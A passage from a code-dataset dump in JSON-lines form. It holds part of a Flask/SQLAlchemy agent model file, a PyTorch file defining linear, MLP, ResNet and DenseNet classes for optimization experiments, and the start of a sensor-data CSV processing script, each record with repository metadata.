= app_id\n self.settings = settings\n self.state = state\n if params:\n self.params = params\n else:\n ParametrizedMixin.__init__(self, kwargs)\n\n def __repr__(self):\n return 'Agent({})'.format(self.id)\n\n def get_id(self, **kwargs):\n return self.id\n\n def get_config(self, agent_id):\n agent_config = session.get('agent_config', {})\n if not agent_config:\n agent = Agent.query.filter_by(id=agent_id).first()\n agent_config = agent.parameters\n session.setdefault('agent_config', agent_config)\n return agent_config\n\n def clone(self):\n db.session.expunge(self)\n make_transient(self)\n self.id = None\n self.name = 'clone of ' + self.name\n db.session.add(self)\n db.session.commit()\n\n\nclass AgentsSimilarityMatrix(db.Model, JsonDeSerMixin, AuditMixin):\n __tablename__ = 'agents_similarity_matrix'\n\n matrix_id = Column(Integer, autoincrement=True)\n agent_id = Column(Integer, ForeignKey(Agent.id), primary_key=True)\n nlp = Column(String, primary_key=True)\n match_unit = Column(String, primary_key=True)\n matrix = Column(JSON)\n\n def __init__(self, agent_id='', **kwargs):\n self.agent_id = agent_id\n\n def update(self, nlp='spacy', match_unit='match_unit'):\n agent_id = self.agent_id\n luke_url = server_config['luke']['base_url']\n matrix_url = '{luke_url}/api/apps/{app_id}/similarity_matrix/{nlp}/{match_unit}'.format(**locals())\n response = requests.get(matrix_url)\n\n self.nlp = nlp\n self.match_unit = match_unit\n self.matrix = response.json()['similarity_matrix']\n\n db.session.merge(self)\n db.session.commit()", "repo_name": "chentingdong/illusionist", "sub_path": "illusionist/models/agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 2926, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "python_utils.flask_sqlalchemy_base.db.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.AuditMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.JsonDeSerMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.JSON", "line_number": 20, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 23, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session.setdefault", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 48, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.expunge", "line_number": 52, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 52, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 52, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.make_transient", "line_number": 53, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.add", "line_number": 56, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 56, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 56, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.commit", "line_number": 57, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 57, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 57, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 60, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.JsonDeSerMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.AuditMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 63, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 64, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 66, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.JSON", "line_number": 67, "usage_type": "argument"}, {"api_name": "python_utils.config.server_config", "line_number": 74, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.merge", "line_number": 82, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 82, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 82, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.commit", "line_number": 83, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 83, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "13885662686", "text": "\nfrom torch import nn\nfrom torch.nn import functional as F\nimport math\nimport torch\n\n# something for discrete outputs\nclass SoftmaxDiscreteLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(SoftmaxDiscreteLinearModel, self).__init__()\n # set info\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.output_linear = nn.Linear(num_inputs, num_actions)\n self.model_type = 'SoftmaxDiscreteLinearModel'\n if num_actions == 1:\n self.sm = torch.nn.Sigmoid()\n else:\n self.sm = nn.Softmax(dim=1)\n def sample(self, state):\n probs = self.forward(state)\n dist = torch.distributions.Categorical(probs)\n action = dist.sample()\n return dist.sample(), dist.log_prob(action), torch.argmax(logits,dim=-1)\n def log_prob(self, state, action):\n if not torch.is_tensor(state):\n state = torch.tensor(state).to(self.device)\n action = torch.tensor(action).to(self.device)\n probs = self.forward(state)\n dist = torch.distributions.Categorical(probs)\n return dist.log_prob(action)\n def transform_state(self, state):\n return state\n def forward(self, state):\n state = self.transform_state(state)\n logits = self.output_linear(state)\n # logits = torch.clamp(logits, min=-8,max=2)\n probs = self.sm(logits)\n if self.num_actions == 1:\n probs = probs.reshape(-1) \n return probs\n\n# something for discrete outputs\nclass DiscreteLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(DiscreteLinearModel, self).__init__()\n # set info\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.output_linear = nn.Linear(num_inputs, num_actions)\n self.model_type = 'DiscreteLinearModel'\n def sample(self, state):\n logits = self.forward(state)\n logits = torch.clamp(logits, min=-20,max=2)\n dist = torch.distributions.Categorical(logits=logits)\n action = dist.sample()\n return dist.sample(), dist.log_prob(action), torch.argmax(logits,dim=-1)\n def log_prob(self, state, action):\n if not torch.is_tensor(state):\n state = torch.tensor(state).to(self.device)\n action = torch.tensor(action).to(self.device)\n logits = self.forward(state)\n logits = torch.clamp(logits, min=-20,max=20)\n dist = torch.distributions.Categorical(logits=logits)\n return dist.log_prob(action)\n def transform_state(self, state):\n # if torch.is_tensor(state):\n # state = state.cpu().numpy()\n return state\n def forward(self, state):\n state = self.transform_state(state)\n logits = self.output_linear(state)\n return logits\n\n# =====================================================\n# Something for continous outputs\nclass ContinuousLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(ContinuousLinearModel, self).__init__()\n # something to compute it all\n self.mean_linear = nn.Linear(num_inputs, num_actions)\n\n def forward(self, state):\n state = state.float()\n output = self.mean_linear(state)\n return self.mean_linear(state)\n\n# =====================================================\n# Network for mfac\nclass LinearNueralNetworkModel(nn.Module):\n def __init__(self, input_size, hidden_sizes, output_size, bias=True):\n super().__init__()\n self._prediction_params = None\n self.input_size = input_size\n if output_size:\n self.output_size = output_size\n self.squeeze_output = False\n else:\n self.output_size = 1\n self.squeeze_output = True\n if len(hidden_sizes) == 0:\n self.hidden_layers = []\n self.output_layer = nn.Linear(self.input_size, self.output_size, bias=bias)\n else:\n self.hidden_layers = nn.ModuleList([nn.Linear(in_size, out_size, bias=bias) for in_size, out_size in zip([self.input_size] + hidden_sizes[:-1], hidden_sizes)])\n self.output_layer = nn.Linear(hidden_sizes[-1], self.output_size, bias=bias)\n def forward(self, x):\n x = x.view(-1, self.input_size)\n out = x\n for layer in self.hidden_layers:\n Z = layer(out)\n out = Z\n logits = self.output_layer(out)\n if self.squeeze_output:\n logits = torch.squeeze(logits)\n return logits\n\n# =====================================================\n# MLP\nclass Mlp(nn.Module):\n def __init__(self, input_size=784,\n hidden_sizes=[512, 256],\n n_classes=10,\n bias=True, dropout=False):\n super().__init__()\n\n self.dropout=dropout\n self.input_size = input_size\n self.hidden_layers = nn.ModuleList([nn.Linear(in_size, out_size, bias=bias) for\n in_size, out_size in zip([self.input_size] + hidden_sizes[:-1], hidden_sizes)])\n self.output_layer = nn.Linear(hidden_sizes[-1], n_classes, bias=bias)\n\n def forward(self, x):\n x = x.view(-1, self.input_size)\n out = x\n for layer in self.hidden_layers:\n Z = layer(out)\n out = F.relu(Z)\n\n if self.dropout:\n out = F.dropout(out, p=0.5)\n\n logits = self.output_layer(out)\n\n return logits\n\n# =====================================================\n# ResNet\nclass ResNet(nn.Module):\n def __init__(self, num_blocks, num_classes=10):\n super().__init__()\n block = BasicBlock\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(\n 3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512 * block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(\n planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck_DenseNet(nn.Module):\n def __init__(self, in_planes, growth_rate):\n super().__init__()\n self.bn1 = nn.BatchNorm2d(in_planes)\n self.conv1 = nn.Conv2d(in_planes, 4*growth_rate, kernel_size=1, bias=False)\n self.bn2 = nn.BatchNorm2d(4*growth_rate)\n self.conv2 = nn.Conv2d(4*growth_rate, growth_rate, kernel_size=3, padding=1, bias=False)\n\n def forward(self, x):\n out = self.conv1(F.relu(self.bn1(x)))\n out = self.conv2(F.relu(self.bn2(out)))\n out = torch.cat([out,x], 1)\n return out\n\n\nclass Transition(nn.Module):\n def __init__(self, in_planes, out_planes):\n super(Transition, self).__init__()\n self.bn = nn.BatchNorm2d(in_planes)\n self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)\n\n def forward(self, x):\n out = self.conv(F.relu(self.bn(x)))\n out = F.avg_pool2d(out, 2)\n return out\n\nclass DenseNet(nn.Module):\n def __init__(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10):\n super().__init__()\n self.growth_rate = growth_rate\n\n num_planes = 2*growth_rate\n self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)\n\n self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0])\n num_planes += nblocks[0]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans1 = Transition(num_planes, out_planes)\n num_planes = out_planes\n\n self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1])\n num_planes += nblocks[1]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans2 = Transition(num_planes, out_planes)\n num_planes = out_planes\n\n self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2])\n num_planes += nblocks[2]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans3 = Transition(num_planes, out_planes)\n num_planes = out_planes\n\n self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3])\n num_planes += nblocks[3]*growth_rate\n\n self.bn = nn.BatchNorm2d(num_planes)\n self.linear = nn.Linear(num_planes, num_classes)\n\n def _make_dense_layers(self, block, in_planes, nblock):\n layers = []\n for i in range(nblock):\n layers.append(block(in_planes, self.growth_rate))\n in_planes += self.growth_rate\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.trans1(self.dense1(out))\n out = self.trans2(self.dense2(out))\n out = self.trans3(self.dense3(out))\n out = self.dense4(out)\n out = F.avg_pool2d(F.relu(self.bn(out)), 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\ndef DenseNet121(num_classes):\n return DenseNet(Bottleneck_DenseNet, [6,12,24,16], growth_rate=32,\n num_classes=num_classes)\n\ndef DenseNet169():\n return DenseNet(Bottleneck_DenseNet, [6,12,32,32], growth_rate=32)\n\ndef DenseNet201():\n return DenseNet(Bottleneck_DenseNet, [6,12,48,32], growth_rate=32)\n\ndef DenseNet161():\n return DenseNet(Bottleneck_DenseNet, [6,12,36,24], growth_rate=48)\n\ndef densenet_cifar():\n return DenseNet(Bottleneck_DenseNet, [6,12,24,16], growth_rate=12)\n", "repo_name": "WilderLavington/Target-Based-Surrogates-For-Stochastic-Optimization", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 12638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.squeeze", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 120, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 199, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 201, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 212, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 219, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 219, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 225, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 238, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 240, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 250, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 253, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 257, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 261, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 262, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 263, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 266, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 272, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 272, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 276, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 279, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 283, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 283, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 289, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 289, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 293, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 299, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 328, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 328, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "6417899803", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 17:26:32 2021\n\n@author: nilah\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport csv_reader\nimport datetime\n\n\nheaders_annotated = ['Time', 'Class', 'AccX_L', 'AccY_L', 'AccZ_L', 'GyrX_L', 'GyrY_L', 'GyrZ_L',\n 'MagX_L', 'MagY_L', 'MagZ_L', 'AccX_T', 'AccY_T', 'AccZ_T', 'GyrX_T', 'GyrY_T',\n 'GyrZ_T', 'MagX_T', 'MagY_T', 'MagZ_T', 'AccX_R', 'AccY_R', 'AccZ_R', 'GyrX_R',\n 'GyrY_R', 'GyrZ_R', 'MagX_R', 'MagY_R', 'MagZ_R']\n\nheaders = ['Time', 'AccX_L', 'AccY_L', 'AccZ_L', 'GyrX_L', 'GyrY_L', 'GyrZ_L',\n 'MagX_L', 'MagY_L', 'MagZ_L', 'AccX_T', 'AccY_T', 'AccZ_T', 'GyrX_T', 'GyrY_T',\n 'GyrZ_T', 